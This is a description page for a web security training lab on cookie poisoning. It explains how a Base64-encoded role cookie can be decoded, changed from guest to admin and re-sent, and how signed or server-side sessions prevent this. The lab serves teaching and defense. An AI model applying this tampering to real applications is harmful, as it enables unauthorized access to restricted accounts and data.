Hack the Cookie: Cookie Poisoning Attack
Tamper a Base64 session cookie to escalate from guest to admin
Exploit a cookie poisoning flaw in a corporate portal: decode the Base64 session cookie, switch your role to admin, and capture the flag. Hands-on web security practice, no setup beyond your browser.
Takeshi
user
devlnunes
user
m7mdsmry
user
BlackPitBull
user
FerrariBilly
user
Andrey
user
gui11hermee
user
DaimondDust
user
Cain
user
Silencee
user
Ayush0044
user
Butch
user
MAHARJAN
user
arissaaaaa
user
ra1sha
user
Cookie poisoning is one of the most fundamental web security flaws, and understanding it is essential for anyone entering application security. HTTP cookies are small pieces of data the browser stores and sends with every request to the originating server. When a web application stores authorization decisions in client-side cookies without integrity protection, an attacker can tamper with those values to escalate privileges and reach restricted functionality. This hands-on HackerDNA lab lets you exploit exactly that mistake.
How Cookie-Based Authentication Works
Many applications use cookies to track sessions and store authentication state. After login, the server hands the browser a cookie holding session information. Sometimes that is a random session identifier that points to data kept on the server; other times it is the actual user data encoded with a reversible scheme like Base64 or JSON. The security question is simple: does the server validate the cookie when it comes back, or does it trust whatever the client sends?
When an application stores a role, user ID, or permission flag directly in a cookie using reversible encoding instead of a cryptographic signature, it opens the door to cookie poisoning. An attacker decodes the cookie, changes the role from guest to admin, re-encodes it, and sends it back. If the server trusts the value, the attacker gains administrative access. That single missing check is why cookie tampering remains a staple of web security training and real-world bug bounty reports.
Base64 Is Encoding, Not Encryption
A common misconception is that a Base64 cookie is encrypted. Base64 is only an encoding that turns binary data into ASCII text, so it offers zero confidentiality. Any Base64 value decodes instantly with built-in browser tools, the atob() console function, or a command-line utility like base64 -d. Developers who lean on Base64 to obscure sensitive cookie data are building a false sense of security that an attacker unwinds in seconds.
Defending Against Cookie Poisoning
Secure applications never trust client-side data for authorization. Server-side sessions keep roles and permissions on the server and reference them with a random session ID that leaks nothing. When a cookie must carry user data, a cryptographic signature (HMAC) or authenticated encryption makes tampering detectable. Modern frameworks ship this for you: Flask with itsdangerous, Django signed cookies, and Express.js cookie-session all reject a modified cookie instead of trusting it. Practice the attack here, and you will recognize the defense everywhere.
What You Will Learn
- Identify how web applications use cookies for authentication and session state
- Decode and inspect Base64-encoded session cookies with browser developer tools
- Modify a cookie role value to escalate privileges from guest to admin
- Distinguish between encoding, signing, and encrypting cookie data
- Apply cookie poisoning defenses such as HMAC-signed and server-side sessions
Prerequisites
Ready to hack this lab?
Create a free account and start practicing cybersecurity hands-on.
Start Your Challenge
Launch your dedicated machine to begin hacking
New here? Here's what to do
Ready to hack this lab?
Create a free account to start your own dedicated server, submit flags, and earn XP on the leaderboard.
Start Hacking Free
